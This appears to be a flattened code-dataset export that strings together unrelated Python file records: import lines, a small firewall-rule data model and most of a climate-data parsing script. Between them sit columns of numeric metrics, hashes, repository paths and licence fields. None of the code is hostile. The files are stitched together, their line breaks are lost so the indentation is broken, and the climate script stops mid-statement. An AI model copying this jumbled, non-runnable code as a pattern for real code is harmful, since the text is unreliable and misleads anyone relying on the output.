from app.models.setting import BaseModel, Engine, session from app.models.arxiv_query import ArxivQueryModel from app.models.paper import PaperModel
37.25
57
0.852349
21
149
6
0.619048
0.166667
0.309524
0
0
0
0
0
0
0
0
0
0.09396
149
3
58
49.666667
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
145a3a50d99379e7770ecd5451d176e171d66f3b
219
py
Python
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
src/attack_surface_pypy/models/v1/models/firewall.py
ccrvs/attack_surface_pypy
f2bc9998cf42f4764f1c495e6243d970e01bd176
[ "CC0-1.0" ]
null
null
null
from attack_surface_pypy import types from attack_surface_pypy.models.v1.models import base, tag class FirewallRuleModel(base.BaseModel): fw_id: types.FW_ID source_tag: tag.TagModel dest_tag: tag.TagModel
24.333333
58
0.794521
33
219
5.030303
0.545455
0.120482
0.204819
0.253012
0
0
0
0
0
0
0
0.005319
0.141553
219
8
59
27.375
0.87766
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.333333
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
14679d1b215e6455f7d92d1f8834e5b65db4980d
26
py
Python
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
src/utils/__init__.py
AlexMabry/aoc21
da492f53f93ba960e282b8c664041b76871631ea
[ "Apache-2.0" ]
null
null
null
from .aocd_utils import *
13
25
0.769231
4
26
4.75
1
0
0
0
0
0
0
0
0
0
0
0
0.153846
26
1
26
26
0.863636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
1473d71c0d5609632a19e373ee5f67c3735385ad
578,867
py
Python
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
null
null
null
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
1
2021-07-28T20:09:34.000Z
2021-07-28T20:30:14.000Z
clmt-parser.py
ksgwxfan/climate-parser
d2f8f9a225dcf30ffc2fc6cd76749fffecc6b8af
[ "MIT" ]
null
null
null
# v2.92 import datetime from time import time import calendar from statistics import mean, pstdev, mode, median, median_grouped from math import floor import csv import os from textwrap import wrap from string import Template import random import traceback # assisted on nested list comprehensions: https://www.geeksforgeeks.org/nested-list-comprehensions-in-python/ def quicklist(vrbl,**kw): if vrbl not in ["prcp","snow","snwd","tmax","tmin"]: return print("OOPS! Improper variable entered. Try again!") vdictionary = {"prcp":"Precipitation Totals","snow":"Snow Totals","snwd":"Snow Depths","tmax":"High Temperatures","tmin":"Low Temperatures"} if all(x in kw and len(list(kw.keys())) == 1 for x in ["season"]): # all yrs; specific season; all months & days #if type(kw["season"]) == list: #qwkli = [] #for s in kw["season"]: qwkli.extend(x for y in metclmt if type(y) == int for x in metclmt[y][s][vrbl]) #else: # If just one season passed qwkli = [x for y in metclmt if type(y) == int for x in metclmt[y][kw["season"]][vrbl]] print("* Completed list for all {} occurring in Meteorological {} from the entire record *".format(vdictionary[vrbl],kw["season"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["metyear"]): # specific metyear; all months & days try: qwkli = metclmt[kw["metyear"]][vrbl] print("* Completed list for all {} occurring in the Meteorological Year {}. Same as metclmt[{}]['{}'] *".format(vdictionary[vrbl],kw["metyear"],kw["metyear"],vrbl)) except: if kw["metyear"] not in metclmt: print("OOPS! No records are available for the Meteorological Year {}".format(kw["metyear"])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["metyear","season"]): # specific metyear; specific season; all months & days try: qwkli = metclmt[kw["metyear"]][kw["season"]][vrbl] print("* Completed list for all {} occurring in Meteorological {} of the Year {}. Same as metclmt[{}]['{}']['{}'] *".format(vdictionary[vrbl],kw["season"],kw["metyear"],kw["metyear"],kw["season"],vrbl)) except: if kw["metyear"] not in metclmt: print("OOPS! No records are available for {}".format(kw["year"])) elif kw["month"] not in metclmt[kw["metyear"]]: print("OOPS! No records are available for {} {}".format(calendar.month_name[kw["month"]],kw["metyear"])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["year","month"]): # specific year; specific month; all days try: qwkli = clmt[kw["year"]][kw["month"]][vrbl] print("* Completed list for all {} occurring in {} {}. Same as clmt[{}][{}]['{}'] *".format(vdictionary[vrbl], calendar.month_name[kw["month"]],kw["year"],kw["month"],kw["year"],vrbl)) except: if kw["year"] not in clmt: print("OOPS! No records are available for {}".format(kw["year"])) elif kw["month"] not in clmt[kw["year"]]: print("OOPS! No records are available for {} {}".format(calendar.month_name[kw["month"]],kw["year"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["year"]): # specific year; all months; all days try: qwkli = clmt[kw["year"]][vrbl] print("* Completed list for all {} occurring in {}. Same as clmt[{}]['{}'] *".format(vdictionary[vrbl],kw["year"],kw["year"],vrbl)) except: if kw["year"] not in clmt: print("OOPS! No records are available for {}".format(kw["year"])) elif all(x in kw and len(list(kw.keys())) == 1 for x in ["month"]): # all years; specific month; all days qwkli = [x for y in clmt if type(y) == int for m in clmt[y] if type(m) == int and m in clmt[y] and m == kw["month"] for x in clmt[y][kw["month"]][vrbl]] print("* Completed list for all {} occurring in the month of {} for all years on record.".format(vdictionary[vrbl],calendar.month_name[kw["month"]])) elif all(x in kw and len(list(kw.keys())) == 2 for x in ["month","day"]): # all years; specific month; specific day if vrbl == "prcp": qwkli = [float(clmt[y][kw["month"]][kw["day"]].prcp) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].prcp not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].prcpQ in ignoreflags] elif vrbl == "snow": qwkli = [float(clmt[y][kw["month"]][kw["day"]].snow) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].snow not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].snowQ in ignoreflags] elif vrbl == "snwd": qwkli = [float(clmt[y][kw["month"]][kw["day"]].snwd) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].snwd not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].snwdQ in ignoreflags] elif vrbl == "tmax": qwkli = [int(clmt[y][kw["month"]][kw["day"]].tmax) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].tmax not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].tmaxQ in ignoreflags] elif vrbl == "tmin": qwkli = [int(clmt[y][kw["month"]][kw["day"]].tmin) for y in clmt if type(y) == int and kw["month"] in clmt[y] and kw["day"] in clmt[y][kw["month"]] and clmt[y][kw["month"]][kw["day"]].tmin not in ["","-9999","9999"] and clmt[y][kw["month"]][kw["day"]].tminQ in ignoreflags] print("* Completed list for all {} occurring on {} {} for all years on record *".format(vdictionary[vrbl],calendar.month_name[kw["month"]],kw["day"])) return qwkli def percentiles(li): li.sort() # Sort list from smallest value to largest n = len(li) percentiles = [x for x in range(5,95+5,5)] # list of kth percentiles we'll be calculating for k in percentiles: i = k/100 * (n + 1) if i / 1 == int(i): # if 'i' is an integer... print("{}th Percentile: {}".format(k,li[int(i)-1])) else: i_down = int(i) i_up = int(i)+1 print("{}th Percentile: {:.1f}".format(k,mean([li[i_down-1],li[i_up-1]]))) def percentile(k,li): if k <= 0 or k >= 100: return print("OOPS! Invalid percentile. Try again") li.sort() # Sort list from smallest value to largest n = len(li) i = k/100 * (n + 1) if i / 1 == int(i): # if 'i' is an integer... print("{}th Percentile: {}".format(k,li[int(i)-1])) else: i_down = int(i) i_up = int(i)+1 print("{}th Percentile: {:.1f}".format(k,mean([li[i_down-1],li[i_up-1]]))) def revperc(v,li): if v < min(li) or v > max(li): return print("OOPS! Invalid value. Ensure to select one that is in the range of the data") li.sort() xli = sorted([x for x in li if x < v]) # Number of data < value x = len(xli) # " " " yli = [y for y in li if y == v] # Number of times value shows up in the passed list y = len(yli) # " " " n = len(li) # lenght of entire list k = round((x + 0.5*y)/n*100) print("{} is the {}th Percentile".format(v,k)) def stats(li): # Q1 ~ 25th percentile; Q2 ~ 50th percentile and median; Q3 ~ 75th percentile; # sort the list from smallest to largest # if len(li) of a quartile == 0, it is the mean of the 2 most-central points li.sort() # orders the values from smallest to largest # [52, 68, 73, 77, 82, 89, 91, 96] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 # [52, 68, 73, 75, 77, 82, 89, 91, 96, 97] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 8 9 # [52, 68, 73, 75, 77, 82, 91, 96, 97] --> for list where len == 8, Q2 would be mean(ix3, ix4) --> len(li)/2-1, len(li)/2 # 0 1 2 3 4 5 6 7 8 # rli = sorted([random.randint(20,100) for x in range(20)]) # feb_tmax = [tmax for y in clmt if type(y) == int for m in clmt[y] if m in clmt[y] and m == 2 for tmax in clmt[y][m]["tmax"] if len(clmt[y][m]["tmax"]) > excludemonth] L1 = li[:-1 * int(len(li)/2)] L3 = li[-1 * int(len(li)/2):] if len(li) % 2 == 0 and len(li)/2 % 2 == 0: # indicates an even number in the set whose mean is also an even number Q1 = mean([L1[int(len(L1)/2)-1],L1[int(len(L1)/2)]]) Q2 = mean([li[int(len(li)/2)-1],li[int(len(li)/2)]]) Q3 = mean([L3[int(len(L1)/2)-1],L3[int(len(L1)/2)]]) else: if len(li) % 2 == 0: # indicates an even number in the set whose mean is an odd number Q2 = mean([li[int(len(li)/2)-1],li[int(len(li)/2)]]) Q3 = L3[int(len(L3)/2)] else: Q2 = li[int(len(li)/2)] # odd number of items in list Q3 = L3[int(len(L3)/2)-1] Q1 = L1[int(len(L1)/2)] IQR = Q3 - Q1 M = mean(li) PSDV = pstdev(li) colwidth = max(len(str(x)) for x in [Q1,Q2,Q3]) print("Stats") print("-----") print(" {:^{cwid}} {:^{cwid}} {:^{cwid}}".format("Q1","Q2","Q3",cwid=colwidth)) print(" {:-^{cwid}} {:-^{cwid}} {:-^{cwid}}".format("","","",cwid=colwidth)) print(" {:^{cwid}} {:^{cwid}} {:^{cwid}}".format(Q1,Q2,Q3,cwid=colwidth)) print("-----") print("Mean: {:.1f}".format(M),end="") print("; PSTDEV: +/- {:.1f}".format(PSDV)) print("1STDEV Range: [ {:.1f}, {:.1f} ]".format(M-PSDV,M+PSDV),end="") print("; Values w/in 1PSTDEV: {:.1f}%".format(len([x for x in li if x >= M-PSDV and x <= M+PSDV])/len(li)*100)) print("2STDEV Range: [ {:.1f}, {:.1f} ]".format(M-2*PSDV,M+2*PSDV),end="") print("; Values between 1 & 2PSTDEV: {:.1f}%".format((len([x for x in li if x >= M-2*PSDV and x <= M+2*PSDV])-len([x for x in li if x >= M-PSDV and x <= M+PSDV]))/len(li)*100)) #print("Values w/in range (Q1,Q3]: {:.1f}%".format(len([x for x in li if x <= Q3 and x > Q1])/len(li)*100)) print("IQR (Q3-Q1): {}".format(IQR),end="") print("; Range of Potential Outliers: < {}; > {}".format(Q1-1.5*IQR,Q3+1.5*IQR)) if min(li) < Q1-1.5*IQR or max(li) > Q3+1.5*IQR else print("; * No Outliers") print("Potential Outliers: QTY {}; {}".format(len([x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR]),[x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR])) if len([x for x in li if x < Q1-1.5*IQR or x > Q3+1.5*IQR]) > 0 else print("") def histogram(li): li.sort() li_set = sorted(list(set(li))) d = {} for x in li: if x not in d: d[x] = 1 else: d[x] += 1 max_rows = max(amt for amt in d) print("Temperature","Frequency",sep=",") for x in li_set: print("{}".format(x),"{}".format(d[x]),sep=",") class DayRecord: """Parses each line of date-specific data; not used by user""" # int(each[5][0:4])][int(each[5][5:7])][int(each[5][8:10]) def __init__(self,raw): self.stationid = raw[0] self.station_name = raw[1] self.station_lat = raw[2] self.station_lon = raw[3] self.station_elev = raw[4] ry = int(raw[5][0:4]) rm = int(raw[5][5:7]) rd = int(raw[5][8:10]) self.daystr = raw[5] self.entryday = datetime.date(ry,rm,rd) # PRCP - Precipitation self.prcp = raw[6] flags_prcp = raw[7].split(",") self.prcpM, self.prcpQ, self.prcpS, self.prcpT = attchk(flags_prcp) if self.prcpQ in ignoreflags and self.prcp not in ["9999","-9999",""] and float(self.prcp) > 0: if round(float(self.prcp),2) not in clmt_vars_days["prcp"]: clmt_vars_days["prcp"][round(float(self.prcp),2)] = [] clmt_vars_days["prcp"][round(float(self.prcp),2)].append(self.entryday) # SNOW - Snow self.snow = raw[8] flags_snow = raw[9].split(",") self.snowM, self.snowQ, self.snowS, self.snowT = attchk(flags_snow) if self.snowQ in ignoreflags and self.snow not in ["9999","-9999",""] and float(self.snow) > 0: if round(float(self.snow),1) not in clmt_vars_days["snow"]: clmt_vars_days["snow"][round(float(self.snow),1)] = [] clmt_vars_days["snow"][round(float(self.snow),1)].append(self.entryday) # SNWD - Snow Depth self.snwd = raw[10] flags_snwd = raw[11].split(",") self.snwdM, self.snwdQ, self.snwdS, self.snwdT = attchk(flags_snwd) if self.snwdQ in ignoreflags and self.snwd not in ["9999","-9999",""] and float(self.snwd) > 0: if round(float(self.snwd),1) not in clmt_vars_days["snwd"]: clmt_vars_days["snwd"][round(float(self.snwd),1)] = [] clmt_vars_days["snwd"][round(float(self.snwd),1)].append(self.entryday) # TMAX - Maximum Temperature self.tmax = raw[12] flags_tmax = raw[13].split(",") self.tmaxM, self.tmaxQ, self.tmaxS, self.tmaxT = attchk(flags_tmax) if self.tmaxQ in ignoreflags and self.tmax not in ["9999","-9999",""]: if int(self.tmax) not in clmt_vars_days["tmax"]: clmt_vars_days["tmax"][int(self.tmax)] = [] clmt_vars_days["tmax"][int(self.tmax)].append(self.entryday) # TMIN - Minimum Temperature self.tmin = raw[14] flags_tmin = raw[15].split(",") self.tminM, self.tminQ, self.tminS, self.tminT = attchk(flags_tmin) if self.tminQ in ignoreflags and self.tmin not in ["9999","-9999",""]: if int(self.tmin) not in clmt_vars_days["tmin"]: clmt_vars_days["tmin"][int(self.tmin)] = [] clmt_vars_days["tmin"][int(self.tmin)].append(self.entryday) # TAVG - Daily Average Temperature if self.tmaxQ in ignoreflags and self.tmax not in ["9999","-9999",""] and self.tminQ in ignoreflags and self.tmin not in ["9999","-9999",""]: tempavg = round(mean([int(self.tmax),int(self.tmin)]),1) if tempavg not in clmt_vars_days["tavg"]: clmt_vars_days["tavg"][tempavg] = [] clmt_vars_days["tavg"][tempavg].append(self.entryday) def clmtAnalyze(filename,**CITY): """Initializes the build of city & session-specific climate dictionaries; Required for the successful use of the script. clmtAnalzye(filename, **{city=str}) REQUIRED: filename --> str version of the filename (a csv) of interest. OPT **kwargs: city=str --> Dictates output of the city-name. This is useful if multiple stations are compiled together to represent the data as it wouldn't be recommended to use a singular station's name if it isn't a complete representation of the data. """ if os.path.isfile(filename) == False: return print('"{}" not found! Try again!'.format(filename)) global clmt global metclmt global FILE global clmt_vars_days global clmt_vars_months global station_ids FILE = filename clmt = {} metclmt = {} clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}} clmt_vars_months = {"prcp":{},"prcpDAYS":{},"snow":{},"snowDAYS":{},"snwd":{},"snwdDAYS":{},"tavg":{},"tmax":{},"tmin":{}} station_ids = [] START = time() print("*** Script Running. Please Wait ***") def statbuild(y,m,d): # Will run through if clmt[y][m][d] doesn't exist # YEAR and MONTH - Additional keys if "recordqty" not in clmt[y]: clmt[y]["recordqty"] = 1 else: clmt[y]["recordqty"] += 1 if "recordqty" not in clmt[y][m]: clmt[y][m]["recordqty"] = 1 else: clmt[y][m]["recordqty"] += 1 if "prcp" not in clmt[y]: clmt[y]["prcp"] = [] clmt[y]["prcpDAYS"] = 0 clmt[y]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} if "prcp" not in clmt[y][m]: clmt[y][m]["prcp"] = [] clmt[y][m]["prcpDAYS"] = 0 clmt[y][m]["prcpPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: if float(clmt[y][m][d].prcp) > 0: clmt[y]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y]["prcpPROP"]["day_max"][1] = [] clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y][m]["prcpPROP"]["day_max"][1] = [] clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": clmt[y]["prcpDAYS"] += 1 clmt[y][m]["prcpDAYS"] += 1 if "snow" not in clmt[y]: clmt[y]["snow"] = [] clmt[y]["snowDAYS"] = 0 clmt[y]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} if "snow" not in clmt[y][m]: clmt[y][m]["snow"] = [] clmt[y][m]["snowDAYS"] = 0 clmt[y][m]["snowPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: clmt[y]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y]["snowPROP"]["day_max"][1] = [] clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y][m]["snowPROP"]["day_max"][1] = [] clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": clmt[y]["snowDAYS"] += 1 clmt[y][m]["snowDAYS"] += 1 if "snwd" not in clmt[y]: clmt[y]["snwd"] = [] clmt[y]["snwdDAYS"] = 0 clmt[y]["snwdPROP"] = {"day_max":[-1,[]]} if "snwd" not in clmt[y][m]: clmt[y][m]["snwd"] = [] clmt[y][m]["snwdDAYS"] = 0 clmt[y][m]["snwdPROP"] = {"day_max":[-1,[]]} if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: clmt[y]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y]["snwdPROP"]["day_max"][1] = [] clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y][m]["snwdPROP"]["day_max"][1] = [] clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": clmt[y]["snwdDAYS"] += 1 clmt[y][m]["snwdDAYS"] += 1 if "tmax" not in clmt[y]: clmt[y]["tempAVGlist"] = [] clmt[y]["tmax"] = [] clmt[y]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if "tmax" not in clmt[y][m]: clmt[y][m]["tempAVGlist"] = [] clmt[y][m]["tmax"] = [] clmt[y][m]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]]} if "tmin" not in clmt[y]: clmt[y]["tmin"] = [] clmt[y]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if "tmin" not in clmt[y][m]: clmt[y][m]["tmin"] = [] clmt[y][m]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]]} if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if (clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin)) or clmt[y][m][d].tmin == "": clmt[y]["tmax"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_max"][1] = [] clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_min"][1] = [] clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_max"][1] = [] clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_min"][1] = [] clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if (clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax)) or clmt[y][m][d].tmax == "": clmt[y]["tmin"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_max"][1] = [] clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_min"][1] = [] clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_max"][1] = [] clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_min"][1] = [] clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) with open(filename,newline="") as f: print("--- COMPILING DICTIONARIES ---") csvfile = csv.reader(f, delimiter=',') for each in csvfile: if each[0] in ["STATION",'"STATION"']: pass else: if each[0] not in station_ids: station_ids.append(each[0]) if "station" not in clmt: if "city" in CITY: clmt["station_name"] = CITY["city"] else: clmt["station_name"] = each[1] clmt["station"] = each[0] print("--- City: {} ---".format(clmt["station_name"])) clmt["coordinates"] = "{}, {}".format(each[2],each[3]) clmt["elevation"] = each[4] if "station" not in metclmt: if "city" in CITY: metclmt["station_name"] = CITY["city"] else: metclmt["station_name"] = each[1] metclmt["station"] = each[0] metclmt["coordinates"] = "{}, {}".format(each[2],each[3]) metclmt["elevation"] = each[4] #if y % 10 == 0: print("{},".format(each[5][0:4]),end=" ") y = int(each[5][0:4]) m = int(each[5][5:7]) d = int(each[5][8:10]) if y not in clmt: clmt[y] = {} # YEAR if m not in clmt[y]: clmt[y][m] = {} # MONTH # DAY Record stuff if d in clmt[y][m]: # This will replace the existing DayRecord if the entire entry was blank if all(v == "" for v in [clmt[y][m][d].prcp,clmt[y][m][d].snow,clmt[y][m][d].snwd,clmt[y][m][d].tmax,clmt[y][m][d].tmin]): clmt[y][m][d].stationid = each[0] clmt[y][m][d].station_name = each[1] clmt[y][m][d].station_lat = each[2] clmt[y][m][d].station_lon = each[3] clmt[y][m][d].station_elev = each[4] clmt[y][m][d].prcp = each[6] flags_prcp = each[7].split(",") clmt[y][m][d].prcpM, clmt[y][m][d].prcpQ, clmt[y][m][d].prcpS, clmt[y][m][d].prcpT = attchk(flags_prcp) if clmt[y][m][d].prcp not in ["","-9999","9999"] and clmt[y][m][d].prcpQ in ignoreflags: if float(clmt[y][m][d].prcp) > 0: clmt[y]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif 